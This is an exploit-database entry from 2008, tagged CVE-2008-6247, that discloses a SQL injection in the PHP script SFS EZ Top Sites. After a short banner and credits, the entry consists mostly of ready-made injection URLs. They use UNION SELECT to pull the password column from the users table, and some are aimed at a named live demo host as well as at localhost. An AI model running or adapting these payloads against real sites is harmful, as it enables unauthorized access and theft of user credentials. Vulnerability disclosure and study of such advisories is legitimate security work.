SFS EZ Top Sites - SQL Injection
Author: Stack
type: webapps
platform: php
port:
date_added: 2008-10-30
date_updated: 2016-12-30
verified: 1
codes: OSVDB-49539;CVE-2008-6247
tags:
aliases:
screenshot_url:
application_url:
###########################################################################
# Kira has decide be back after halloween
###########################################################################
# Discovered by : Mountassif Moad
# Type Gap : Sql injection
# Script : SFS EZ Top Sites Remote sql Injection
# Home Script : http://www.scripts-for-sites.info/item.php?item=112
# Greetz : Allah , All my freind
##########################################################################
http://localhost/topsites/topsite.php?ts=-1/**/UNION/**/SELECT/**/1,password,3,4,5+from+users/*
Demo :
http://turnkeyzone.com/demos/topsites/topsite.php?ts=-1/**/UNION/**/SELECT/**/1,password,3,4,5+from+users/*
http://turnkeyzone.com/demos/topsites/topsite.php?ts=-169%20union%20select%201,2,3,4,5/*
# milw0rm.com [2008-10-31]